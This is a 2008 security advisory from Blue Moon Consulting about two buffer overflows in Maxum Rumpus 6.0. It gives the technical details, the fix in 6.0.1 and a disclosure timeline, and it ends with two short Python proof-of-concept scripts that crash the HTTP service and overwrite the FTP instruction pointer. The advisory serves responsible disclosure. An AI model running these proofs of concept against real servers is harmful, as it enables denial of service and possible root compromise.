--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
BLUE MOON SECURITY ADVISORY 2008-09
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1
Description
-----------
Rumpus turns any Mac into a file transfer server.
Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FT=
P modules. The first allows an unauthenticated user to crash Rumpus. The la=
ter may result in arbitrary code execution under superuser privilege.
The overflow in HTTP component is caused by the lack of boundary check when=
parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactl=
y 2908-byte long, the server runs into a segmentation fault and crashes. A =
manual restart is required. It has been observed that this problem occurs a=
t other verb lengths too. The vulnerability is rated at moderate severity f=
or the lost of service.
The overflow in FTP component is also caused by the lack of length check wh=
en parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD=
`` and so on. The overflow occurs when the argument is ``strcpy`` to an int=
ernal buffer. This buffer is 1024-byte long. When the passed-in argument is=
longer than 1046 bytes, the instruction pointer will be overwritten. This =
allows a successful attack to run arbitrary code under the privilege of a s=
uperuser (root) by default. Though authorization is required to exploit thi=
s security bug, the vulnerability is rated at critical severity because the=
FTP daemon could be allowing anonymous access.
Workaround
----------
There is no workaround the first bug.
Disable ANONYMOUS and only allow trusted users to use FTP.
Fix
---
Maxum has released Rumpus v6.0.1 which addressed these bugs.
Disclosure
----------
Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/pol=
icy.html>`_ in notifying vendors.
:Initial vendor contact:
November 28, 2008: Initial contact sent to support@maxum.com
:Vendor response:
November 28, 2008: John requested further communications to be sent to th=
e same address.
:Further communication:
November 28, 2008: Technical details and request for regular update of a =
patch sent to the vendor.
November 29, 2008: Vendor thanked for the bug report and planned to relea=
se v6.0.1 on Monday, December 01.
December 01, 2008: Vendor released 6.0.1 and posted release note at http:=
//www.maxum.com/Rumpus/News601.html.
:Public disclosure: December 01, 2008
:Exploit code:
For the vulnerability in HTTP component::
from socket import socket, AF_INET, SOCK_STREAM
host =3D "192.168.1.12"
port =3D 80
s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')
s.recv(1024)
s.close()
For the vulnerability in FTP component::
from socket import socket, AF_INET, SOCK_STREAM
=20
host =3D "192.168.1.12"
port =3D 21
user =3D "regular"
pass_ =3D "training"
=20
commands =3D [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
]
=20
s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
for line in commands:
s.send(line)
s.recv(1024)
s.close()
Disclaimer
----------
The information provided in this advisory is provided "as is" without warra=
nty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, ei=
ther express or implied, including the warranties of merchantability and fi=
tness for a particular purpose. Your use of the information on the advisory=
or materials linked from the advisory is at your own risk. Blue Moon Consu=
lting Co., Ltd reserves the right to change or update this notice at any ti=
me.
--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAkk0FzMACgkQbKzcTD214ZfTpgCfbW7vSKOjWf/18jvwK6Y2Uwmd
zPAAoJX+CHQwr10VgangC7Hs3v7bug5H
=oAv3
-----END PGP SIGNATURE-----
--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk--